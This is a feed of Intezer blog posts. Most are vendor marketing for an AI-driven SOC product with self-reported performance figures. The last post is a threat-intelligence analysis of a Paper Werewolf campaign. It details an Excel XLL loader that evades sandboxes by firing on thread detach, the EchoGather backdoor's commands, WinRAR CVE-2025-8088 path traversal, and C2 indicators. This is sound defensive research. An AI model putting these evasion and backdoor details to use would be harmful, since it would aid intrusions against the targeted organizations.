Reading view

Alert fatigue is costing you: Why your SOC misses 1% of real threats

Introducing the 2026 Intezer AI SOC Report for CISOs

For years, security leaders have lived with an uncomfortable truth. It has been to date, simply impossible to investigate every alert. As alert volumes exploded and teams failed to scale, SOCs, whether in-house or outsourced, normalized “acceptable risk” with the deprioritization of low-severity and informational alerts.

Our latest research shows that this approach is no longer defensible.

Intezer has just released the 2026 AI SOC Report for CISOs, based on the forensic analysis of more than 25 million security alerts across live enterprise environments. The findings reveal a critical disconnect between how security teams prioritize alerts and where real threats actually originate, and the cost of that gap is far higher than most organizations realize .

Why “acceptable risk” is no longer acceptable 

Across endpoint, cloud, identity, network, and phishing telemetry, Intezer found that nearly 1% of confirmed incidents originated from alerts initially labeled as low-severity or informational. On endpoints, that figure climbed to nearly 2%.

At enterprise scale, that percentage is not noise.

For a typical organization generating roughly 450,000 alerts per year, this translates to ~50 real threats annually, about one per week, never investigated by a SOC or MDR team. These are not theoretical risks. They are real compromises hiding in plain sight, dismissed not because they were benign, but because teams lacked the capacity to look.

What the data revealed across the attack surface

Because Intezer AI SOC investigates 100% of alerts using forensic-grade analysis, the report exposes how attackers actually operate once you remove triage bias from the equation.

Endpoint security is more fragile than reported

More than half of endpoint alerts were not automatically mitigated by endpoint protection tools. Of those, nearly 9% were confirmed malicious. Even more concerning, 1.6% of endpoints undergoing live forensic scans were still actively compromised despite being reported as “mitigated” by EDR tools.

See the full endpoint threat data → Download the 2026 AI SOC Report

Low-severity does not mean low-risk

Within endpoint alerts alone, 1.9% of low-severity and informational alerts were real incidents, the exact alerts most SOCs never review.

Attackers favor stealth over noise

Cloud telemetry was dominated by defense evasion and persistence techniques, reflecting a shift toward long-term access, token abuse, and misuse of legitimate services rather than overt exploitation.

Phishing has moved into trusted platforms and browsers

Fewer than 6% of malicious phishing emails contained attachments. Most relied on links, language, and abuse of legitimate services such as cloud file sharing, code sandboxes, CAPTCHA mechanisms, where traditional controls have limited visibility.

Cloud misconfigurations persist as silent risk multipliers

Most cloud posture findings stemmed from legacy or default configurations, especially in Amazon S3, including missing encryption, weak access controls, and lack of logging—issues often classified as “low severity,” yet repeatedly exploited once attackers gain a foothold.

To read the full report and all the findings, download the CISOs guide to AI SOC 2026 here. 

Why traditional SOCs fail: capacity, fragmentation and judging alerts by their severity

Modern SOC failures are rarely the result of a single broken tool or negligent team. They are the outcome of structural tradeoffs that every traditional SOC—internal or MDR—has been forced to make.

Capacity is the first constraint.
Human analysts do not scale linearly with alert volume. As telemetry expands across endpoint, cloud, identity, network, and SaaS, SOCs hit a hard ceiling. The only way to cope is aggressive triage: close most alerts automatically, investigate only what looks “important,” and hope severity labels align with reality. The 2026 AI SOC Report shows that this assumption is false at scale.

Tool fragmentation compounds the problem.
Most SOC stacks are collections of siloed detections, EDR, SIEM, identity, cloud posture, email, each optimized for a narrow signal. Severity is assigned locally, without cross-surface context or forensic validation. As a result, alerts are scored based on abstract rules, not evidence of compromise. When SOCs trust these labels blindly, they inherit the tools’ blind spots.

Process tradeoffs lock risk in place.
Once triage rules are defined, they become institutionalized. Low-severity alerts are ignored by design. MDR providers codify this into SLAs. Internal SOCs bake it into runbooks. Crucially, there is no closed-loop feedback: missed threats do not automatically improve detections, because they were never investigated in the first place.

The outcome is not an occasional failure. It is systematic, repeatable risk, embedded directly into how SOCs operate.

Real-world examples of missed threats hiding in plain sight

The data in the 2026 AI SOC Report makes clear that missed threats are not exotic edge cases. They are ordinary attacks progressing quietly through environments because no one looked.

Endpoints marked “mitigated” but still compromised
In over 1.6% of live forensic endpoint scans, Intezer found active malicious code running in memory even though the EDR had already reported the threat as resolved. These cases included stealers, RATs, and post-exploitation frameworks, often originating from low-severity alerts that never triggered deeper inspection. Without memory-level forensics, these compromises would have remained invisible.

Phishing hosted on trusted platforms
Attackers increasingly host phishing pages on legitimate developer platforms like Vercel and CodePen, or abuse trusted cloud services such as OneDrive and PayPal. The parent domains appear reputable, so alerts are downgraded or ignored. Yet behind them are live credential-harvesting pages that bypass email gateways and browser-based defenses alike.

Cloud misconfigurations as delayed breach accelerators
Many cloud posture findings such as unencrypted S3 buckets, missing access logs and permissive cross-account policies rarely trigger action. But once an attacker gains any foothold, these long-standing misconfigurations dramatically accelerate lateral movement, persistence, and data exposure.

In every case, the failure was not detection. The signal existed. The failure was investigation.

How attackers deliberately exploit SOC blind spots

Attackers understand SOC economics better than most defenders.

They know which alerts generate fatigue.
They know which detections are noisy.
They know which categories are deprioritized by default.

As a result, modern attackers design their campaigns to blend into the backlog, not trigger alarms.

Stealth over speed
Cloud intrusions favor defense evasion, persistence, and token abuse over loud exploitation. These behaviors generate alerts, but rarely high-severity ones. The report shows cloud telemetry dominated by exactly these tactics, indicating attackers are optimizing for long-term access rather than immediate impact.

Living off trusted infrastructure
Phishing campaigns increasingly abuse legitimate brands, file-sharing services, CAPTCHA frameworks, and developer platforms. These environments inherit trust by default, allowing attackers to operate under severity thresholds that SOCs routinely ignore.

Multi-stage loaders and memory-only execution
On endpoints, attackers rely on layered loaders, in-memory payloads, and obfuscation techniques that evade static detections. Initial alerts may look benign or incomplete. Without forensic follow-through, SOCs miss the actual compromise entirely.

Attackers are not evading detection systems alone, rather they are exploiting SOC decision-making models.

What this means for your SOC operations

For CISOs and SOC leaders, the implication is stark:
Risk is no longer defined by what you detect, but by what you choose not to investigate.

If your SOC:

  • Ignores low-severity alerts by default
  • Relies on severity labels without forensic validation
  • Limits investigations based on human capacity
  • Operates without a feedback loop between outcomes and detections

Then missed threats are not anomalies, they are guaranteed.

The organizations that will reduce risk in 2026 are not adding more dashboards or rewriting triage rules. They are adopting operating models where investigation is no longer a scarce resource.

This is why AI-driven, forensic-grade SOC platforms fundamentally change the equation. When every alert is investigated:

  • Severity becomes evidence-based, not assumed
  • Detection quality improves through real-world validation
  • Attackers lose the ability to hide in “acceptable risk”
  • SOC teams regain control without scaling headcount

This is the shift behind the Intezer AI SOC model and why the concept of acceptable risk must be redefined for the modern threat landscape.

This all changes when you can investigate everything

The data in the 2026 AI SOC Report points to a different reality, one where AI-driven forensic analysis removes investigation capacity as a constraint.

When every alert is investigated:

  • “Low severity” stops being a proxy for “safe”
  • Detection quality improves through real-world validation
  • Missed threats drop from dozens per year to near zero
  • Escalations fall below 2%, without sacrificing coverage
  • Risk tolerance is defined by evidence, not exhaustion

This is the operating model behind Intezer AI SOC, powered by ForensicAI™ and it is why the definition of acceptable risk must be reset.

Download the report and join the discussion

The 2026 AI SOC Report for CISOs is grounded in:

  • 25 million alerts analyzed
  • 10 million monitored endpoints and identities
  • 82,000 forensic endpoint investigations, including live memory scans
  • Telemetry from 7 million IP addresses, 3 million domains and URLs, and over 550,000 phishing emails

All data was aggregated and anonymized across Intezer’s global enterprise customer base.

👉 Download the full report to explore the findings in detail, and
👉 Join Intezer’s research team on Wednesday, February 4th at 12 p.m. ET for a live webinar breaking down what this data means for SOC leaders and CISOs.

Because in 2026, the biggest risk is no longer what you detect, it’s what you choose not to investigate.

The post Alert fatigue is costing you: Why your SOC misses 1% of real threats appeared first on Intezer.

  •  

How AI brings the OSCAR methodology to life in the SOC

When I look back on my years as a SOC lead in MDR, the thing I remember most clearly is the tension between wanting to do things the “right way” and simply trying to survive the day.

The alert queue never stopped growing. The attack surface kept expanding into cloud, identity, SaaS, and whatever new platform the business adopted. And every shift ended with the same uneasy feeling: What did we miss because there wasn’t enough time to investigate everything fully?

While different sources emphasize different challenges, recent statistics from late 2024 and 2025 reports reflect exactly what so many SOC analysts and leads feel:

  • The majority of alerts are never touched. Recent surveys indicate that 62% of alerts are ignored largely because the sheer volume makes them impossible to address. Furthermore, many analysts report being unable to deal with up to 67% of the daily alerts they receive.
  • The volume is unmanageable for humans. A typical SOC now processes an average of 3,832 alerts per day. For analysts trying to manually triage this flood, the math simply doesn’t add up.
  • Burnout is the new normal. The pressure is unsustainable, with 71% of SOC analysts reporting burnout due to alert fatigue. This has accelerated turnover, with some SOCs seeing analyst retention cycles shrink to less than 18 months, eroding institutional knowledge.

When people outside the SOC see these numbers, they assume analysts aren’t doing their jobs. The truth is the opposite. Most analysts are doing the best work they can inside a system that was never built for volume. Traditional triage is reactive and heavily dependent on intuition. On a good day, that might work. On a bad day, it leads to inconsistent decisions, coverage gaps, and immense pressure on analysts who care deeply about getting it right.

This is where the OSCAR methodology becomes valuable again.

Why the OSCAR methodology still matters

As a SOC lead, I always wanted the team to approach alerts with organizational structure. OSCAR provides that structure by creating a clear, repeatable sequence:

  • Obtain Information
  • Strategize
  • Collect Evidence
  • Analyze
  • Report

It removes guesswork and helps analysts who are still developing their skills stay grounded during chaotic shifts. But here is the reality I learned firsthand – You can only scale OSCAR so far with humans alone.

Evidence collection takes time. Deep analysis takes more time. No matter how motivated an analyst is, there are simply not enough hours in a shift to apply OSCAR to every alert manually. Most teams end up applying the methodology selectively; critical and high-severity alerts get the full OSCAR treatment, while everything else gets whatever time is left.

That gap between process and reality is exactly where Intezer enters the picture.

How Intezer operationalizes OSCAR at scale

Intezer takes the proven structure of OSCAR and executes it automatically and consistently across every alert. Instead of relying on how much energy an analyst has left 45 minutes before there shift ends, Intezer performs evidence collection, deep forensic analysis, and reporting at a speed and depth no human team could sustain.

Here is how the platform automates the methodology step-by-step:

O: Information obtained

In my SOC days, gathering context meant jumping between consoles and browser tabs, hoping nothing crashed. Intezer collects all of this instantly from endpoints, cloud platforms, identity systems, and threat intel sources. Analysts start every case with the full picture rather than a partial one.

S: Strategy suggested

Instead of relying on an analyst’s instinct about what might be happening, the Intezer platform generates verdicts and risk-based priorities immediately (with 98% accuracy). This provides critical consistency, especially for junior analysts who are still finding their confidence. Additionally, all AI reasoning is fully backed by deterministic, evidence based analysis.

C: Evidence collected

This was always the slowest part of manual investigation. Intezer collects memory artifacts, files, process information, and cloud activity in seconds. No hunting, no guessing, and no hoping you pulled the right logs before they rolled over.

A: Analysis (forensic-grade)

Intezer performs genetic code analysis, behavioral analysis, static/dynamic analysis, and threat intelligence correlation on every single alert. This is the level of scrutiny senior analysts wish they had time to do manually, but usually can only afford for the most critical incidents.

Read more about how Intezer Forensic AI SOC operates under the hood.

R: Reporting & transparency

The platform creates clear, structured, audit trails. This removes the burden of manual documentation from analysts and ensures that the “why” behind every decision is transparent and explainable.

The result: Moving beyond “speed vs. depth”

When OSCAR is coupled with Intezer’s AI Forensic SOC, the operation transforms. We see this in actual customer environments:

  • 100% alert coverage: Even low-severity and “noisy” alerts are fully triaged.
  • Sub-minute triage: Drastically improved MTTR/MTTD and minimized backlogs.
  • 98% accurate decisioning: Verdicts are supported by deterministic evidence, reducing escalations for human review to less than 4%.

The shift in operations:

CapabilityTraditional MDR SOCIntezer Forensic AI SOC
CoverageCritical and High-severity100% of alerts
Triage time20+ mins per alert<2 mins (automated)
Analyst modeData collectorInvestigator

From the perspective of a former SOC lead, the most important benefit is this: 

”Analysts finally get to think again. Automation handles the busy work. Humans get to use judgment, creativity, and experience.”

Final thoughts

For years, triage has been treated like a speed exercise. But the threats we face today require depth, context, and clarity. OSCAR gives SOCs the investigative structure they need, and Intezer provides the scale required to actually use that structure across every alert.

For the first time, teams don’t have to choose between speed and depth. They get both.

If your SOC wants to move from reactive to truly investigative operations, we would be happy to show you what an OSCAR-driven Intezer SOC looks like in practice.

The post How AI brings the OSCAR methodology to life in the SOC appeared first on Intezer.

  •  

Building effective AI for the SOC: How Intezer Forensic AI SOC follows Anthropic’s best practices

One of the most influential publications on real-world AI system design is Anthropic’s guide, Building Effective Agents. Its core message is simple:
Effective AI requires structure first, adaptability second.

Anthropic emphasizes that AI agents work best when:

  1. A deterministic workflow does all the structured work up front
  2. The agent only activates when uncertainty remains
  3. The agent begins with full context, not an empty slate
  4. Tool usage is controlled and evidence-driven
  5. Human-in-the-loop remains central for oversight and trust

These principles ensure accuracy, avoid hallucinations and keep investigations reproducible, all critical requirements for cybersecurity.

Intezer Forensic AI SOC is built on exactly this philosophy. Our platform uses a dual-mode design with Intezer AI Workflow and AI Agent, completely aligning with Anthropic’s best practices to deliver fast, scalable and highly accurate investigations across a broad range of alerts, all while keeping analysts in the loop.

Here is how Intezer implements Anthropic’s best practices for agents.

Structured first: Intezer AI Workflow handles the majority of alerts

Anthropic advises that AI systems should begin with deterministic workflows instead of free-form reasoning. In cybersecurity, this is essential for accuracy, auditability, trust and scalability (when handling huge volumes of alerts).

Intezer’s AI Workflow mode is a structured triage process designed by security experts and executed with strict consistency. It applies AI only at key decision points, not as the driver of the entire investigation.

This approach provides:

  • Deterministic, reproducible results
  • High speed due to streamlined, parallelizable steps
  • Lower costs because heavy reasoning is used sparingly
  • No drift or unexpected branching
  • Clear human oversight points

Most alerts, especially well-defined ones, are fully resolved at this stage, giving SOCs broad alert coverage at low cost.

Adaptive only when needed: Intezer AI Agent extends the investigation

Anthropic states that agents should activate only when the structured workflow reaches uncertainty, and only after they inherit the full context. Intezer follows this exactly.

AI Agent mode activates only when the Workflow cannot reach a high-confidence verdict.

At that point, the agent:

  • Starts with all evidence collected so far
  • Avoids premature assumptions
  • Uses tools deliberately and contextually
  • Expands the investigation where human analysts would
  • Surfaces deeper behavioral patterns or cross-asset correlations

This ensures the agent is guided, not free-floating, and its decisions remain grounded in evidence, not guesswork.

Tools the AI Agent can leverage once activated

  • Dynamic SIEM queries
  • EDR/XDR telemetry lookups
  • Identity provider (IDP) investigation
  • Behavioral analysis of processes and command lines
  • User activity mapping
  • Process ancestry and parent-child correlation
  • Intezer’s historical alert database
  • Code DNA similarity and malware lineage tracking
  • Additional host, memory, or file-based forensics

The result is deeper investigation where it matters, without unnecessary cost.

Human-in-the-loop by design

Intezer keeps human analysts at the center so they can review and override conclusions, and trace every decision made by Intezer. Of course, all evidence and reasoning is grounded in forensic data and is fully transparent and explainable for beginners and advanced analysts alike.

This aligns with Anthropic’s principle that humans remain final decision-makers, especially in high-stakes domains like cybersecurity.

How this architecture improves SOC performance

Intezer’s adherence to Anthropic’s best practices produces measurable outcomes across the three most important SOC metrics: accuracy, coverage, and speed, while also reducing cost.

Accuracy

Intezer’s approach of combining deterministic forensics + adaptive AI = best-in-class verdict quality.

  • The structured workflow prevents hallucinations
  • The AI Agent only activates with strong guardrails
  • Context inheritance ensures consistent reasoning
  • Analysts always have visibility and control

This hybrid approach dramatically reduces false positives and prevents premature conclusions.

Triage of all alerts, including low-severity (where threats often hide)

Because AI Workflows handle the bulk of alerts inexpensively and AI Agents only run when needed, heavy and expensive reasoning calls are minimized

This frees SOCs from cherry-picking which alerts to ingest allowing them to triage and investigate them all.

This is crucial for:

  • High-volume enterprise environments
  • MSSPs with strict SLAs
  • Cloud-scale detection pipelines
  • 24/7 monitoring teams

You get broad alert coverage without inflating compute costs.

Speed: Structured steps + adaptive depth

  • Workflow mode resolves most alerts within seconds
  • Agents accelerate investigations that normally take analysts hours
  • No bottlenecks, no backlog, no manual evidence gathering

The result is a SOC where every alert is investigated quickly, consistently, and with forensic depth.

Table of how Intezer’s design reflects Anthropic’s guidance

Anthropic best practiceHow Intezer implements it
Start with deterministic workflowsAI Workflow handles structured triage with predefined expert steps
Activate agents only when neededAI Agent triggers only when confidence is insufficient
Give agents full contextAgent inherits the entire Workflow evidence set
Control tool usageAgent selects tools based on evidence, not speculation
Maintain human-in-the-loopAnalysts can verify, guide, and override conclusions
Prioritize safety and reproducibilityEvery action is logged, justified, and traceable

Conclusion: Anthropic’s Agent principles in a real SOC

Anthropic’s framework for building effective agents is now influencing industries far beyond general AI research. Intezer Forensic AI SOC might be one of the strongest real-world implementations of these practices in cybersecurity.

By combining:

  • Deterministic workflows for reliable baseline investigations
  • Adaptive agents for deeper reasoning when needed
  • Human oversight for trust and accountability
  • Cost efficiency enabling full-pipeline alert coverage

Intezer is able to deliver fast, accurate, and scalable triage that transforms SOC operations.

Learn more about how you can transform your SOC today.

The post Building effective AI for the SOC: How Intezer Forensic AI SOC follows Anthropic’s best practices appeared first on Intezer.

  •  

The 7 CISO requirements for AI SOC in 2026

I recently participated in a security leader roundtable hosted by Cybersecurity Tribe. During this session, I got to hear firsthand from security leaders at major organizations including BNP Paribas, the NFL, ION Group, and half a dozen other global enterprises.

Across industries and maturity levels, their priorities were remarkably consistent. When it comes to AI-powered SOC platforms, these are the seven capabilities every CISO is asking for.

1. Trust and traceability

If there was one theme that came up more than anything else, it was trust. Security leaders don’t want “mysterious” AI. They want transparency.

They repeatedly insisted that AI outputs must be auditable, explainable, and reproducible.
They need to show the work, for compliance auditors, for internal governance boards, and increasingly to address emerging legal and regulatory risk.

Black-box decisions won’t cut it. AI must generate evidence, not just conclusions.

2. Reduction of alert fatigue (operational efficiency)

Every leader I spoke with is wrestling with alert overload. Even mature SOCs are drowning in low-value notifications and pseudo-incidents.

A measurable reduction in alerts escalated to humans is now a top KPI for evaluating AI platforms. Leaders want an environment where analysts spend their time on exploitable, high-impact threats, not noise.

If AI can remove repetitive triage work, that’s not just helpful,  it’s transformational.

3. Contextual, risk-based prioritization (beyond CVSS)

No one wants yet another dashboard that nags them about high CVSS scores on systems nobody actually cares about.

CISOs want AI that can fuse:

  • Telemetry
  • Vulnerability data
  • Identity information
  • Business context (asset criticality, job role, data sensitivity, process impact)

The goal is prioritization that reflects real organizational risk, not arbitrary severity scores.

They want AI to tell them: This is the one alert that actually matters today and here’s why.”

Get your editable copy of the one deck you need to pitch your board for 2026 AI SOC budget.

4. Safe automation with human-in-the-loop for high-impact actions

Most leaders are open to selective autonomous remediation, but only in narrow, well-defined, high-confidence scenarios.

For example:

  • Rapid ransomware containment
  • Isolation of clearly compromised endpoints
  • Automatic execution of repeatable hygiene tasks

But for broader or higher-impact actions, CISOs still want human review. The tone was clear:
AI should move fast where appropriate, but never at the expense of control.

5. Integration and practical telemetry coverage

Every leader emphasized that an AI platform is only as good as the data it can consume.

The must-have list included:

  • Cloud telemetry (AWS, Azure, GCP)
  • Identity providers (Okta, Entra ID, Ping)
  • EDR/XDR
  • SIEM logs
  • Ticketing/ITSM
  • Custom threat intelligence feeds

They don’t want a magical AI that promises answers without good data.
They want a connected system that can see across the entire environment.

6. Executive & board alignment with demonstrable ROI

CISOs aren’t implementing AI in a vacuum. Their boards and executive leadership teams are pressuring them from two very different angles:

  • Some are mandating AI adoption as a strategic priority.
  • Others are slowing everything down with extensive governance, risk, and compliance processes.

To navigate this dynamic, CISOs need clear, defensible ROI:

  • Reduced operating costs
  • Faster mean-time-to-respond
  • Fewer escalations
  • More predictable outcomes

AI without measurable value is no longer acceptable.
They need something they can put in front of the board and say, “Here’s the impact.”

7. Accountability and legal clarity

Before enterprises allow AI to autonomously take security actions, CISOs need a fundamental question answered:

“Who is accountable when the AI acts?”

This isn’t just a theoretical concern. It’s a gating requirement for adoption.

Until there is clear guidance on liability, responsibility, and governance, many organizations will keep AI on a tight leash.

Closing thoughts

Across all of these conversations, the message was consistent:
AI in the SOC is inevitable, but it must be safe, transparent, integrated, and measurable.

CISOs aren’t looking for science fiction. They’re looking for credible, operational AI that enhances their teams, strengthens their defenses, and aligns with business realities.

Read about why the best LLMs are not enough for the AI SOC.

The post The 7 CISO requirements for AI SOC in 2026 appeared first on Intezer.

  •  

Tracing a Paper Werewolf campaign through AI-generated decoys and Excel XLLs

An XLL is a native Windows DLL that Excel loads as an add-in, allowing it to execute arbitrary code through exported functions like xlAutoOpen. Since at least mid-2017, threat actors began abusing Microsoft Excel add-ins via the .XLL format, the earliest documented misuse is by the threat group APT10 (aka Stone Panda / Potassium) injecting backdoor payloads via XLLs. 

Since 2021, a growing number of commodity malware families and cyber-crime actors have added XLL-based delivery to their arsenals. Notable examples include Agent Tesla and Dridex, researchers observed an increase of these malware being dropped via malicious XLL add-ins.

Attackers typically embed their malicious code in the standard add-in export functions, such as xlAutoOpen. When a user enables the add-in in Excel, the malicious payload executes automatically, dropping or downloading a malicious payload. Some malware families use legitimate frameworks to create XLL (Excel Add-in) files. One common example is Excel-DNA, a popular open-source framework.

These frameworks make it easier for attackers to build and load malicious XLLs. In some cases, they also allow threat actors to pack and execute additional payloads directly in memory.

In late October 2025, a 64-bit DLL compiled as an XLL add-in was submitted to VirusTotal from two different countries. The first submission came from Ukraine on October 26, followed by three separate submissions from Russia beginning on October 27. The Russian-submitted samples were named Плановые цели противника.xll (“enemy’s planned targets”) and Плановые цели противника НЕ ЗАПУСКАТЬ.xll, which depending on context can mean either “Do NOT release the enemy’s planned targets” or “Do NOT activate the enemy’s scheduled targets.”

This DLL contains an embedded second-stage payload, a backdoor we named EchoGather. Once launched, the backdoor collects system information, communicates with a hardcoded command-and-control (C2) server, and supports command execution and file transfer operations. While it uses the XLL format for delivery, its execution chain and payload behavior differ from previously documented threats abusing Excel add-ins. Through pivoting on infrastructure and TTPs we were able to link this campaign to Paper Werewolf (aka GOFFEE), a group that has been targeting Russian organizations.

Explore how Intezer Forensic AI SOC eliminates alert noise so you can focus on real threats.

Technical analysis

Let’s dive in deeper.

What is an XLL?

An XLL is an Excel add-in implemented as a DLL that Excel loads directly, usually with the .xll extension. Microsoft explicitly describes XLL files as a DLL-style add-in that extends Excel with custom functions. 

When a user double clicks the file with the .xll extension, Excel is launched, loads the DLL and calls its exported functions such as xlAutoOpen, initialization code, or xlAutoClose, when unloading. Often malicious XLLs embed their payload inside xlAutoOpen or through a secondary loader, so that code runs immediately once Excel imports the DLL.

Excel XLL add-ins and macros differ mainly in how they execute and the level of control they provide an attacker. Macros, VBA or legacy XLM, run as scripts inside Excel’s macro engine and are constrained by Microsoft’s security model, which now includes blocking macros from the internet, signature requirements, and multiple user-facing warnings. XLLs, on the other hand, are compiled DLLs that Excel loads directly into its own process using LoadLibrary(), giving them the full power of native code without going through macro security checks. While macros rely on interpreted scripting and COM interactions, XLLs can call any Windows API, inject into other processes, or act as full-featured malware loaders. This makes XLLs far more capable and harder to analyze, and it may explain why some threat actors chose XLL-based delivery methods rather than macro-based.

Loader behavior

The DLL exports two functions, xlAutoOpen and xlAutoClose, both of which return zero. This behavior differs from that of legitimate XLL add-ins as well as from previously documented threats abusing the XLL format, such as those described in the most recent CERT-UA publication. In this case, the malicious logic is not tied to the typical export functions but instead is triggered through dllmain. The main function of the loader is called when fdwReason > 2 meaning that dllmain_dispatch was called with DLL_THREAD_DETACH (=3). Essentially the main function will be called when any thread in Excel that previously called into the XLL (even Excel’s own threads) exits.

Triggering the malicious payload during DLL_THREAD_DETACH helps the malware evade detection by delaying execution until a thread exits. This bypasses typical behavior-based detection, which focuses on early-stage activity like PROCESS_ATTACH, making the execution appear benign at first and allowing the second-stage payload to activate covertly after the sandbox times out or AV heuristics complete.

SHA-256: 0506a6fcee0d4bf731f1825484582180978995a8f9b84fc59b6e631f720915da

A call to the function that loads and executes the backdoor.
A call to the function that loads and executes the backdoor.

The embedded file is dropped as mswp.exe in %APPDATA%\Microsoft\Windows, then executed as a hidden process using CreateProcessW with CREATE_NO_WINDOW. Standard Output and Error is captured and redirected via anonymous pipes. If process creation succeeds, the function returns true otherwise, it cleans up and returns false.

The backdoor: EchoGather

We refer to this backdoor as EchoGather due to its focus on system reconnaissance and repeated beaconing behavior. 

SHA-256: 74fab6adc77307ef9767e710d97c885352763e68518b2109d860bb45e9d0a8eb

The dropped payload is a 64-bit backdoor with hardcoded configuration and C2 address. It collects system information and communicates with the C2 over HTTP(S) using the WinHTTP API.

Main function of the backdoor EchoGather.
Main function of EchoGather.

The data collected by EchoGather consists of:

  • IPv4 addresses
  • OS type (“Windows”)
  • Architecture
  • NetBIOS name
  • Username
  • Workstation domain
  • Process ID
  • Executable path
  • Static version string: 1.1.1.1

Next, EchoGather encodes that data using Base64 and sends it to the C2 using POST method. The C2 address is constructed from hardcoded strings. In the analyzed sample the C2 address was: https://fast-eda[.]my:443/dostavka/lavka/kategorii/zakuski/sushi/sety/skidki/regiony/msk/birylievo
This transmission occurs in an infinite loop with randomized sleep intervals between 300–360 seconds.

In all of its C2 communications, EchoGather uses the WinHTTP API. It supports various proxy configurations and is designed to ignore SSL/TLS certificate validation errors, allowing it to operate in environments with custom or misconfigured proxy and certificate settings.

Supported commands 

EchoGather supports four commands. 

All outgoing communication with the C2 is encoded using standard Base64. When a command is received from the C2 the first 36 bytes contain the request ID, it’s a unique identifier that is being used when the backdoor needs to send the information is several packages. 

0x54 Remote Command Execution

EchoGather first extracts the request ID, followed by the command that needs to be executed. It then decrypts the string cmd.exe /C %s using a hardcoded XOR key (0xCA), which serves as a template for command execution. Using this template, it executes the specified command via cmd.exe. The output of the command is captured through a pipe and sent back to the C2 server, with the request ID prepended to the response.

0x45 Return Configuration

Sends the embedded configuration structure to the C2.

0x56 File Exfiltration

The backdoor begins by extracting a request ID and the name of the file to be exfiltrated. It opens the specified file, determines its total size, and calculates how many 512 KB chunks are required for transmission. A transfer header containing metadata about the chunk count and size is then sent to the C2 server. In response, the backdoor receives the request ID used to identify the session. The file is read and transmitted in chunks, with each chunk containing the request ID, chunk index, file tag, data length, and raw file data. 

0x57 Remote File Write

EchoGather receives a filename from the C2 and writes the incoming data chunks to the system, reconstructing the file as the chunks arrive.

Infrastructure analysis

During our research we found two domains that were used by the threat actors.

IP Resolutions for fast-eda.my
  • The domain was registered on September 12, 2025.
  • The very first resolution was between September 12th and 14th, the domain was resolved to 199.59.243[.]228.
  • After that and until November 26th all of the resolutions were on Cloudflare instances. 
  • From September 18th to November 24th the domain was resolved to 172.64.80[.]1
  • On November 27th it was resolved to 94.103.3[.]82 the address is connected to Russia based on geolocation.

When we looked up the related files to this domain on VirusTotal, we found 7 files.
Two of them are powershell scripts that load the backdoor: mswt.ps1 and the second one wasn’t submitted with a name.

The two scripts are identical, including their execution flow. Both first decode two Base64-encoded files: a PDF document and the EchoGather payload. The PDF is opened, while the payload is executed in the background. The document appears to be an invitation, written in Russian, to a concert for high-ranking officers. However, the PDF is AI-generated and contains several noticeable inconsistencies. For instance, the stamp in the lower right corner appears to be an AI-generated attempt at recreating Russia’s national emblem, the double-headed eagle, but the result resembles a distorted or bird-like figure rather than the intended symbol. The text also includes several errors. Some Cyrillic letters are incorrect, for example, the letter Д is used in place of Л in multiple instances, and the word праздиика is a misspelled version of праздника. Additionally, the phrase «с глубоким уважением приглашает» (translated as “with deep respect invites (you)”) is unnatural and not idiomatic in the context of formal Russian invitations.

Decoy document, and invite to a concert.
IP Resolutions for ruzede.com
  • First seen on 2025-05-21, resolved to 162.255.119[.]43 and later to 5.45.85[.]43 until October 2nd.
  • On October 2nd it was resolved to IP addresses in Cloudflare.
  • From October 4th to November 26th the domain was resolved to the same address seen in the previous domain: 172.64.80[.]1
  • On November 26th it was resolved to 193.233.18[.]137 in Russia based on geolocation.
    • The ip address is linked to different malicious domains. 

Using VirusTotal, we pivoted on the domain ruzede[.]com, and we identified a RAR archive that exploits a known vulnerability, CVE-2025-8088, a vulnerability in WinRAR that involves the abuse of NTFS alternate data streams (ADSes) in combination with path traversal. This flaw allows attackers to embed malicious content within seemingly harmless filenames by appending ADSes that include relative path traversal sequences. 

The archive contains a file named Вх.письмо_Мипромторг.lnk:.._.._.._.._.._Roaming_Microsoft_Windows_run.bat 

When the archive is opened, WinRAR fails to properly sanitize these ADS paths and extracts the hidden data streams, placing them in unintended or sensitive locations such as %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup. 

Connected file to the domain ruzede[.]com

The phrase “письмо Мипромторг” is misspelled; the correct form is “письмо Минпромторга.” This term refers to an official letter or communication issued by the Ministry of Industry and Trade of the Russian Federation (Минпромторг России). The same misspelling error is in the archive file name: Вх.письмо_Мипромторг.rar.

Essentially the file in the archive is a batch script that launches a hidden PowerShell process. This process navigates to a user-specific AppData directory, then downloads a PowerShell script named docc1.ps1 from a remote URL (https://2k-linep[.]com/upload/docc1.ps1) and saves it to the current working directory. The script is then executed via a new PowerShell instance with execution policy restrictions bypassed.

The downloaded script (docc1.ps1) extracts both a PDF file and an EchoGather payload, using a technique similar to the one described previously. However, in this instance, the embedded PDF differs from earlier samples. This document is allegedly sent from the deputy of the Ministry of Industry and Trade of the Russian Federation, asking for price justification documentation under the state defense order, focusing on violations of deadlines and reporting on pricing approval processes.

The companies listed with their emails on the top right side of the first page (Almaz-Antey, Shvabe, and the United Instrument-Making Corporation) are major Russian defense-industry and high-technology enterprises, and they might be the intended recipients of this decoy document.

Page 1
Page 2
Page 3

The same vulnerability was used by several threat actors including RomCom (Russia-aligned) and Paper Werewolf, a cyberespionage group targeting Russian organizations and active since 2022. In early August, BI.ZONE Threat Intelligence published a report about an ongoing campaign of Paper Werewolf that exploits CVE-2025-6218, affects WinRAR versions up to and including 7.11 and enables directory traversal attacks that allow malicious archives to extract files outside their intended directories. A second zero-day, at the time, vulnerability that abuses ADSs for path traversal. The report doesn’t mention CVE-2025-8088, but based on the description we assume that is the same vulnerability.

The interesting part is that we can see similarities between the decoy documents from the report to the document above. First, the filename of the decoy document in the report is запрос Минпромторга РФ.pdf (Request of the Ministry of Industry and Trade of the Russian Federation.pdf) no misspellings in the filename. It refers to the same office. The document asks to assess the impact of a specific government resolution on production capacities of subsidy recipients. Next, both documents share the same template and structure: red stamp on the left side, followed by the same information about the office, the date and the request id. Both documents contain a request for information to be submitted to a government-affiliated organization.

Attribution

Based on the shared infrastructure, such as the ruzede[.]com domain, as well as notable similarities in decoy document construction and the exploitation of the WINRAR vulnerability that leverages ADSs, we attribute this campaign to the Paper Werewolf (aka GOFFEE) threat group. The recent use of XLL files suggests that the group is experimenting with new delivery methods while continuing to rely on established infrastructure, possibly in an attempt to evade detection. In addition, the use of a new, yet simple, backdoor may indicate an effort to improve and evolve their toolset.

Summary

